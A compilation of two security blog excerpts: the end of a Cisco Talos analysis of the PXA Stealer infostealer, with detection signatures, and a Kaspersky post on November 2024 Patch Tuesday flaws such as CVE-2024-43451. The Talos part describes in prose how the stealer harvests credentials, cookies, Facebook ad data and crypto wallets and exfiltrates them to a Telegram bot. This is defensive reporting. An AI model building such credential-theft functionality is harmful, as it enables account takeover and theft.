• email: The user’s email address. 
• passmail: The email password. 
• cookie1: Likely a session or authentication cookie. 
• token: Likely an authentication token. 
• info: Account information. 

The stealer also has the functionalities for interacting with Facebook Ads Manager and Graph API using a session authenticated via cookies.  

• It takes a Facebook cookie and parses it for the session information, such as “c_user”, and attempts to access the token. 
• Retrieves and formats the details about the user’s ad accounts, such as account status, currency, balance, spend cap, and amount spent.  
• Gets the list of the user’s Facebook pages, including page name, link, likes, followers, and verification status. 
• It retrieves a list of groups with administrative users. 
• It extracts Business Manager IDs associated with the account and retrieves ad account information under each Business Manager. 
• It uses Facebook data to determine ad account limits for a Business Manager. 
• It extracts the token from Facebook mobile pages to facilitate authenticates requests. 

After collecting the targeted victim’s data, including the login data, browser cookies, autofill information, credit card details, Facebook ads account data, cryptocurrency wallet data, Discord token details, and MinSoft application data, the stealer creates a ZIP archive of all the files in the user profile’s temporary folder with the file name format “CountryCode_Victim’s public IP Computername.zip”, with a high compression level of value nine.  

While creating the archive and navigating the targeted folders, the stealer excludes some of the directories, including user_data, emoji, tdummy, dumps, webview, update-cache, GPUCache, DawnCache, temp, Code Cache, and Cache. It also attempts to rename each file while adding them to the archive. The archive is exfiltrated to the actor’s Telegram bot. After exfiltrating the victim’s data, the stealer deletes the folders that contained the collected user data.  

Coverage 

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here. 

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here. 

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protection with context to your specific environment and threat data are available from the Firewall Management Center. 

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are listed below: 

Snort2: 64217, 64204, 64216, 64215, 64214, 64213, 64212, 64211, 64210, 64209, 64208, 64207, 64206, 64205, 64203 

Snort3: 301057, 301063, 301062, 301061, 301060, 301059, 64217, 301058   

ClamAV detections are also available for this threat: 

Win.Loader.RustLoader-10036712-0 
Py.Infostealer.PXAStealer-10036718-0 
Py.Infostealer.PXAStealer-10036725-0 
Txt.Tool.PXAStealerInstaller-10036719-0 
Txt.Tool.PXAStealerInstaller-10036724-0 
Txt.Tool.PXAStealerInstaller-10036724-0 
Lnk.Downloader.PXAStealer-10036720-0 
Js.Infostealer.CookieStealer-10036722-0 

Indicators of Compromise 

IOCs for this research can be found in our GitHub repository here. 

Cisco Talos Blog – ​Read More

With November’s Patch Tuesday Microsoft fixed 89 vulnerabilities in its products — two of which are being actively exploited. One of them — CVE-2024-43451 — is particularly alarming. It allows attackers to gain access to the victim’s NTLMv2 hash. Although it doesn’t have an impressive CVSS 3.1 rating (only 6.5 / 6.0), its exploitation requires minimal interaction from the user, and it exists thanks to the MSHTML engine — the legacy of Internet Explorer — which is theoretically deactivated and no longer used. Nevertheless, all current versions of Windows are affected by this vulnerability.

Why is CVE-2024-43451 so dangerous?

CVE-2024-43451 allows an attacker to create a file that, once delivered to the victim’s computer, will give the attacker the possibility of stealing the NTLMv2 hash. NTLMv2 is a network authentication protocol used in Microsoft Windows environments. Having access to the NTLMv2 hash, an attacker can perform a pass-the-hash attack and attempt to authenticate on the network by posing as a legitimate user — without having their real credentials.

Of course, CVE-2024-43451 alone is not enough for a full-fledged attack — cybercriminals would have to use other vulnerabilities — but someone else’s NTLMv2 hash would make the attacker’s life much easier. At this point in time we have no additional information about scenarios that use CVE-2024-43451 in practice, but the vulnerability description clearly states that the vulnerability is publicly disclosed, and cases of exploitation have been detected in the wild.

What does “minimal interaction” mean?

It is generally assumed that if a user doesn’t open a malicious file — nothing bad can happen. In this case, that’s not true. According to the mini-FAQ in the security update guide advisory on CVE-2024-43451, exploitation may occur even when the user selects the file (single left-click), inspects it (with a right-click), or performs some “action other than opening or executing”.

What other vulnerabilities did Microsoft close in the November patch?

The second vulnerability that is already being exploited in real attacks is CVE-2024-49039. It allows attackers to escape from the AppContainer environment and, as a result, escalate their privileges to a Medium Integrity Level. In addition, there are two more holes that the company states are disclosed, although they’ve not yet been noticed in real attacks. These are CVE-2024-49019 in the Active Directory Certificate Service, which also allows the attacker to elevate privileges, and CVE-2024-49040 in Exchange, thanks to which malicious emails can be displayed with a fake sender address.

In addition, the critical vulnerability CVE-2024-43639, which allows remote code execution in Kerberos, also looks dangerous — though it only affects servers that are configured as a Kerberos Key Distribution Center (KDC) Proxy Protocol server.

How to stay safe?

In order to stay safe, we recommend, firstly, promptly installing updates for critical software (which, of course, includes the operating systems). In addition, it’s worth remembering that most attacks exploiting software vulnerabilities begin via email. Therefore, we recommend equipping all work devices with a reliable security solution, and not forget about protection at the mail gateway level.

Kaspersky official blog – ​Read More